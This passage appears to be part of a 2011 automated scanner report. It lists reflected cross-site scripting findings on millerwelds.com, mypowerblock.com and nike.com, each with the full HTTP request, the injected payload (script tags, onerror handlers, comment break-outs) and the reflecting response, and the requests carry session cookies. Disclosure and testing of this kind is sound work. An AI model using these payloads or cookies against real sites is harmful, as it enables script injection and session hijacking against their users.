Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:00 GMT
Connection: Keep-Alive
Content-Length: 29432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonpdf391ef"><a>ac7df67acbf">
...[SNIP]...

4.130. http://www.millerwelds.com/products/accessories/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /products/accessories/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99eaa"><a>b06ae5ec7c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /products99eaa"><a>b06ae5ec7c1/accessories/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/results/blog/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.7.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:31 GMT
Connection: Keep-Alive
Content-Length: 29437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonproducts99eaa"><a>b06ae5ec7c1">
...[SNIP]...

4.131. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /products/accessories/international/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70eb0"><a>8e47a0cc7f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /products70eb0"><a>8e47a0cc7f2/accessories/international/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:40 GMT
Connection: Keep-Alive
Content-Length: 29437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonproducts70eb0"><a>8e47a0cc7f2">
...[SNIP]...

4.132. http://www.millerwelds.com/resources/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /resources/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9e7a"><a>1f3f3055d71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resourcesc9e7a"><a>1f3f3055d71/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.6.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:08 GMT
Connection: Keep-Alive
Content-Length: 29438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonresourcesc9e7a"><a>1f3f3055d71">
...[SNIP]...

4.133. http://www.millerwelds.com/results/blog/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /results/blog/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25505"><a>da77f455929 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /results25505"><a>da77f455929/blog/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.6.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:35:10 GMT
Connection: Keep-Alive
Content-Length: 29436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonresults25505"><a>da77f455929">
...[SNIP]...

4.134. http://www.millerwelds.com/service/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /service/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ba2e"><a>f07509a2751 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /service7ba2e"><a>f07509a2751/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/wheretobuy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.2.10.1303147760; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:04 GMT
Connection: Keep-Alive
Content-Length: 29436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonservice7ba2e"><a>f07509a2751">
...[SNIP]...

4.135. http://www.millerwelds.com/wheretobuy/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /wheretobuy/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2574"><a>135130b9509 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wheretobuye2574"><a>135130b9509/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.1.10.1303147760; __qca=P0-154865017-1303147760079

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:36 GMT
Connection: Keep-Alive
Content-Length: 29439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonwheretobuye2574"><a>135130b9509">
...[SNIP]...

4.136. http://www.mypowerblock.com/xn/loader [r parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mypowerblock.com
Path:   /xn/loader

Issue detail

The value of the r request parameter is copied into the application's response. The payload b5f92<a%20b%3dc>dff4a536d96 was submitted in the r parameter. This input was echoed as b5f92<a b=c>dff4a536d96 in the application's response. The scanner's generic description of the context ("plain text between tags") does not match what the response shows: it is served with Content-Type: text/javascript, is requested by the page via XMLHttpRequest, and consists of a single throw statement, so the reflection actually lands inside a single-quoted JavaScript string literal in a script resource.

This behaviour demonstrates that angle brackets and attribute syntax pass through unencoded. Whether that is exploitable depends on the context: a browser that honours the Content-Type will not render this response as HTML when it is navigated to directly, so the injected <a b=c> is inert there, and a single quote or backslash (neither of which this payload contains) would be needed to break out of the string literal. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour, in particular how a single quote or backslash in r is handled and whether the response can be made to render as HTML, and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /xn/loader?v=x201104152208_15&r=xg.index.facebookLikeb5f92<a%20b%3dc>dff4a536d96 HTTP/1.1
Host: www.mypowerblock.com
Proxy-Connection: keep-alive
Referer: http://www.mypowerblock.com/video/2170052:Video:1098573
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xn_visitor=b01cb998-4cbc-4662-a142-e71b9376cf7c; 2__utmz=^ning.1318912976229:63740467.1303144976.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=63740467.1303144978.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utmv=^ning.1303145154495:; 2__utma=^ning.1366217154496:63740467.719855752.1303144976.1303144976.1303144976.1; 2__utmc=^ning.1366217154496:63740467; 2__utmb=^ning.1303146954496:63740467.5.10.1303144976; xn_track=rp%252C%25252Fvideo%252Crc%252C0%252Csi%252C1303144978%252Cse%252C1303145878; __utma=63740467.1234973286.1303144978.1303144978.1303144978.1; __utmc=63740467; __utmb=63740467.3.10.1303144978; ning_session=iTSaRuncRVR5LBphZIF02JJ616fPElyof+WqjALrugHZ0uK5zp6VH/JUvAKW6CtAOI7uIbsifps=

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 16:46:43 GMT
Server: Ningtron/2000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ning_session=iTSaRuncRVR5LBphZIF02JJ616fPElyof+WqjALrugHZ0uK5zp6VH8hJjqBtPX6yArLbrhjg1bI=;Path=/;Domain=.mypowerblock.com;Expires=Mon, 18-Apr-11 17:46:43 GMT
X-XN-Trace-Token: 9ec960bf-5af6-4ed5-83e6-93aa28166c2a
CACHE-CONTROL: max-age=5184000
Content-Type: text/javascript
CACHE-CONTROL: no-cache="Set-Cookie"
Content-Length: 76

throw 'Could not load module: xg.index.facebookLikeb5f92<a b=c>dff4a536d96';

4.137. http://www.nike.com/nikeos/p/nikegolf/en_US/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002D5)%3C/script%3E parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nike.com
Path:   /nikeos/p/nikegolf/en_US/

Issue detail

The value of the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002D5)%3C/script%3E request parameter is copied into the HTML document as plain text between tags. The payload 5e578<script>alert(1)</script>447b06ace9f was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002D5)%3C/script%3E parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nikeos/p/nikegolf/en_US/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002D5)%3C/script%3E5e578<script>alert(1)</script>447b06ace9f HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BSESSIONID=03bJt3hl2W-qEya5zX0IgQ**.sin-20-brand-0; s_sv_sid=235127452972; locale=US_US_EN; language=en; country=US; s_cc=true; AKNIKE=3TNLHYd7ObFv9G1bAmHp-8PdP62KjXeAVIxZLf3JzEpQeWx1W2q00hw; dfa_cookie=nikeall%2Cnikeuslanding; s_sq=nikeuslanding%2Cnikeall%3D%2526pid%253Dnikeos%25253Ep%25253Enike%25253Een_US%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.nike.com%25252Findex.jsp%25253Fsitesrc%25253Duslp%252526country%25253DUS%252526lang_locale%25253Den_US%252523l%25253Dshop%25252Corderstatus%2526ot%253DA; ESESSIONID=l1Qbq4TV5LqopuIJXIGYUg**.sin-21-emea-0; NIKE_COMMERCE_LANG_LOCALE=en_US; NIKE_COMMERCE_COUNTRY=US; NIKE_CCR=11|US|US|US|F|||en_US|K|F; geo_tp=vhigh; geo_bw=5000; AnalysisUserId=64.212.60.188.1303153363042556

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: public, must-revalidate, max-age=1800
Expires: Mon, 18 Apr 2011 19:49:03 GMT
Date: Mon, 18 Apr 2011 19:19:03 GMT
Connection: close
Content-Length: 213313

<!-- INCLUDING DATA SSI: "data_templates/generic_seo_data.html" -->
<!-- BEGIN SSI: "../../../global/templates/fragments/seo/seo.html" -->
<!-- END SSI: "../../../global/templates/fragments/seo/seo.
...[SNIP]...
</script>5e578<script>alert(1)</script>447b06ace9f=";
                       console.log(redirect_location);
                       window.location.replace(redirect_location);
                   }
                   else{
                       console.log('no redirect needed');
                   }
               }


       </script>
...[SNIP]...

4.138. http://www.nike.com/nikeos/p/nikegolf/en_US/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nike.com
Path:   /nikeos/p/nikegolf/en_US/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e5c35<script>alert(1)</script>3ee454ba48d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nikeos/p/nikegolf/en_US/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002D5)%3C/script%3E&e5c35<script>alert(1)</script>3ee454ba48d=1 HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BSESSIONID=03bJt3hl2W-qEya5zX0IgQ**.sin-20-brand-0; s_sv_sid=235127452972; locale=US_US_EN; language=en; country=US; s_cc=true; AKNIKE=3TNLHYd7ObFv9G1bAmHp-8PdP62KjXeAVIxZLf3JzEpQeWx1W2q00hw; dfa_cookie=nikeall%2Cnikeuslanding; s_sq=nikeuslanding%2Cnikeall%3D%2526pid%253Dnikeos%25253Ep%25253Enike%25253Een_US%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.nike.com%25252Findex.jsp%25253Fsitesrc%25253Duslp%252526country%25253DUS%252526lang_locale%25253Den_US%252523l%25253Dshop%25252Corderstatus%2526ot%253DA; ESESSIONID=l1Qbq4TV5LqopuIJXIGYUg**.sin-21-emea-0; NIKE_COMMERCE_LANG_LOCALE=en_US; NIKE_COMMERCE_COUNTRY=US; NIKE_CCR=11|US|US|US|F|||en_US|K|F; geo_tp=vhigh; geo_bw=5000; AnalysisUserId=64.212.60.188.1303153363042556

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: public, must-revalidate, max-age=1780
Expires: Mon, 18 Apr 2011 19:49:24 GMT
Date: Mon, 18 Apr 2011 19:19:44 GMT
Connection: close
Content-Length: 213316

<!-- INCLUDING DATA SSI: "data_templates/generic_seo_data.html" -->
<!-- BEGIN SSI: "../../../global/templates/fragments/seo/seo.html" -->
<!-- END SSI: "../../../global/templates/fragments/seo/seo.
...[SNIP]...
</script>=&e5c35<script>alert(1)</script>3ee454ba48d=1";
                       console.log(redirect_location);
                       window.location.replace(redirect_location);
                   }
                   else{
                       console.log('no redirect needed');
                   }
               }


       </script>
...[SNIP]...

4.139. http://www.nike.com/nikeos/p/usnikefootball/lang_LO/utilities/compress [includes parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nike.com
Path:   /nikeos/p/usnikefootball/lang_LO/utilities/compress

Issue detail

The value of the includes request parameter is copied into a JavaScript inline comment. The payload 86537*/alert(1)//ddfcfbec7af was submitted in the includes parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nikeos/p/usnikefootball/lang_LO/utilities/compress?includes=/sparqtraining/global/modules/sparq/js/helpers.js|/sparqtraining/global/modules/sparq/js/classes/class.ui.js|/sparqtraining/global/modules/sparq/js/survey.js|/sparqtraining/global/js/fbconnect.js|/sparqtraining/global/modules/sparq/js/sparq_functions_global.v2.js86537*/alert(1)//ddfcfbec7af HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nike.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Type: text/javascript;charset=UTF-8
Cache-Control: public, must-revalidate, max-age=3600
Expires: Mon, 18 Apr 2011 20:02:37 GMT
Date: Mon, 18 Apr 2011 19:02:37 GMT
Connection: close
Content-Length: 57611

/* including: /sparqtraining/global/modules/sparq/js/helpers.js */
;var JQ = jQuery.noConflict();
sparq._d = new Date();
sparq.expires = sparq._d*24*60*1000;
(function($) {
$.extend(true, sparq.u
...[SNIP]...
mPublish('', attachment, actionLinks, null, 'What do you think?', self.publishFeedComplete);
}
return self;
}();
;
/* including: /sparqtraining/global/modules/sparq/js/sparq_functions_global.v2.js86537*/alert(1)//ddfcfbec7af */
;

4.140. http://www.nike.com/nsl/services/user/isloggedin [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nike.com
Path:   /nsl/services/user/isloggedin

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8d93d<img%20src%3da%20onerror%3dalert(1)>43df17930bb was submitted in the REST URL parameter 4. This input was echoed as 8d93d<img src=a onerror=alert(1)>43df17930bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /nsl/services/user/isloggedin8d93d<img%20src%3da%20onerror%3dalert(1)>43df17930bb?format=json&app=ballersresume&callback=jsonp1303153392700 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nike.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Content-Language: en-US
Content-Length: 4146
Content-Type: application/json;charset=utf-8
Expires: Mon, 18 Apr 2011 19:03:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 18 Apr 2011 19:03:00 GMT
Connection: close
Set-Cookie: AnalysisUserId=66.160.206.31.1303153380363542; path=/; expires=Tue, 17-Apr-12 19:03:00 GMT; domain=.nike.com
Set-Cookie: JSESSIONID=F46E8DD7DA8AA1CE72908A84205128B1.sin-18-social-1; Domain=.nike.com; Path=/
Set-Cookie: SOCTOKEN=ballersresume|30eb8eda-bfc1-4e6f-8004-b9298a24bc68; Domain=.nike.com; Path=/

jsonp1303153392700({"serviceResponse": {
"header": {
"success": "false",
"dateTime": "2011-04-18 19:03:00.479 UTC",
"errorCodes": [
{
"code": "nsl_generic_error",
"message": "cannot find the isloggedin8d93d<img src=a onerror=alert(1)>43df17930bb method.",
"causeString": "java.lang.NullPointerException\u000ajava.lang.Class.searchMethods(Class.java:2646)\u000ajava.lang.Class.getMethod0(Class.java:2670)\u000ajava.lang.Class.getMethod(Cla
...[SNIP]...

4.141. http://www.nike.com/nsl/services/user/isloggedin [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nike.com
Path:   /nsl/services/user/isloggedin

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 35a95<script>alert(1)</script>64c16fbc047 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nsl/services/user/isloggedin?format=json&app=ballersresume&callback=jsonp130315339270035a95<script>alert(1)</script>64c16fbc047 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nike.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Content-Language: en-US
Content-Length: 216
Content-Type: application/json;charset=utf-8
Expires: Mon, 18 Apr 2011 19:02:43 GMT
